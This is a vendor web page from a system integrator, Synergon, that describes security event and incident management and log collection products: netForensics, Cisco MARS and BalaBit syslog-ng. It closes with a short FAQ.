Synergon System Integrator
English pages/Solutions/IT Security/Security Event and Incident Management Systems, Log Collection, Analysis
Increase font sizeDecrease font size
Print
Security Event and Incident Management Systems, Log Collection, Analysis

The management of IT security incidents is a process that enables companies to detect incidents against their computer systems and provides support for the organized elimination of these threats as fast possible. The purpose of incident management is to provide a solution in time, to handle the situations that developed, thereby minimizing their impact on business operations. One of the first steps of efficient incident management is the detection of the incidents, which is an almost impossible task in the case of firewalls generating several million log entries per day, intrusion preventing tools, virus protection systems, vulnerability analyzing and other systems, without very sophisticated and specialized systems.

netForensics

In general, there is no connection between unrelated systems that would highlight any log entries that might be related, or that could compare the information generated by individual tools to the information generated by the rest of the tools. The nFX SIM|One product of NetForensics is capable of receiving and processing the log entries of various products. By the analysis of log entries running together on the central device, it is capable of highlighting events that could not have been visible on the basis of separate data sets. The automated analyses ensure that the security staff should are not spending 90% of their working time analyzing the logs. This opportunity significantly increases the efficiency of both the security system and the security staff.

nFX SIM|One is capable of generating reports from analyses designed for technicians all the way through comprehensive summary reports, presentable to management.  In addition to the built-in reporting templates, the user's own Crystal Reports templates can also be used.

Redundancy 

nFX SIM|One redundancy can be implemented at every level of the system, even if the installations are distributed geographically.  The correlations among the events are assessed in such a manner that the workload distributing system ensures availability, even if a high volume of log entries need to be processes (for example, DoS attack):   The redundancy among the sites enables the fulfillment of every task from the second site if the primary site goes down (receipt of log entries, analysis, reporting and system compliance check).

Logging 

The robust but also flexible data structure of nFX SIM|One enables the preservation of data integrity and the fulfillment of the audit and reporting requirements. 

There is a separate interface for monitoring the status of the system (System Health Monitor). It provides accurate, on-line information about the status of every element, and generates alarms if they malfunction.

Cisco MARS

Cisco Security MARS is a powerful, highly scalable family of devices used for the management, monitoring and elimination of threats, by which the customers can utilize their network and security devices more efficiently.

  • Cisco Security MARS combines the traditional monitoring of security events with network intelligence featuring automated threat elimination functions.

  • It filters out data flowing through several network components (Cisco or other products), finds the correlations among them, then aborts any attacks

  • It is capable of stopping attacks in progress and exploring the path of the attack

  • The dedicated device can be put to use rapidly and simply

  • It is capable of handling as many as 10 000 events per second

Cisco Security MARS is part of the Cisco Security Management Suite security monitoring package, which enables the administration and comprehensive implementation of the security tools of Cisco set protecting networks.

Netforensics Log One

The Log One solution collects the logs, assorts, compresses and encrypts them, then presents the logs in reports compliance with the rules and audits. nFX Log One will save your company a large part of costs associated with log collection, and thanks to its built-in reports, you can forget about the headaches that have so far been a usual consequence of sophisticated log analysis involving lots of administration. The recently introduced version 6.0 nFX Log One product carries on the large company level log management functionality this product has always been known for, which supports organizations, in meeting all requirements based on the collected event logs.  The new features have been developed mainly owing to the new architecture, enhanced scalability, including features such as syslog data collection, extended data collection, compression, validating capabilities, or even the support provided to 64-bit systems, furthermore, streamlining of the user interface. The capability that it can collect and interpret logs from almost every tool and application, elevates the value of log collection to a high level, and is given a highlighted role in the fulfillment of the audits. With these new features the nFx Log One solution performs well on any level and extension of the IT systems of enterprises.

Balabit SysLog NG

BalaBit IT Security is company developing security technology software, which was established in Hungary and has been operating in the international markets from the very beginning. The development and sales center of BalaBit is located in Budapest, in addition, the company also has a German subsidiary in Munich, which coordinates sales in West Europe.

syslog-ng PE is a multi-platform central logging solution, which includes the logging client and the logging server as well.

On the one hand, the log analysts prepare reports automatically and upon individual requests, from which the administrators operating the system can monitor the general status of the system. The statistics may apply to the peak and average load of the network connection, the processors or the hard disks, distribution of the use of certain services and many other features. On the other hand, the log analysts are also capable of detecting the occurrence of predefined event and sending alerts on the predefined channels. In fact, the predefined events are intelligence programmed by the operators by which the analyzing software knows,what are those network states that, when occurring together, may mean an event giving cause for security concern.

Alerts may take place by the monitoring of specific values, but the more sophisticated, self-learning systems are capable of sending alerts, similarly to the analysis of stock market charts, if the shape of certain time diagrams departs from normal. By the periodically generated reports, the operators of the network can easily fulfill the documentary requirements of the various audits.

WHY SYNERGON SYSTEM INTEGRATOR?

Synergon has outstanding professional skills not only in the field of incident management, but as a supplier of comprehensive infrastructure, it is also an expert for a wide range of solutions to be integrated, which supports the successful implementation of projects. Thanks to these skills, the individual elements and the designs requiring knowledge of the correlations can be easily performed.

FREQUENTLY ASKED QUESTIONS

What is the difference between incident management systems and system management applications?

Incident management systems are targeted solutions developed expressly for the management of security events. Their internal correlation engine has been designed accordingly.

Is this solution suitable for the development of individual interfaces, alerts or access levels?

Yes, one of the significant advantages of the solutions recommended by us is their individual interface, by the customization of this interface we can also ensure the integration of solutions outside the supported list. When setting the alerts, we are able to configure the tools by rule, thus the competent person is always alerted about the given incident, and we can ensure that any information unnecessary for the company can be filtered out. By the regulation of the access levels, we can ensure the levels of separation expected in the various audits.

Is this solution suitable for distributed operation and the archiving of the events?

Yes, that way we can develop the solution even for large IT environments. The archiving of the events is guaranteed by built-in modules.

 

 

@@portlets.html.upto@@

You can acquire more information about our solutions by contacting us.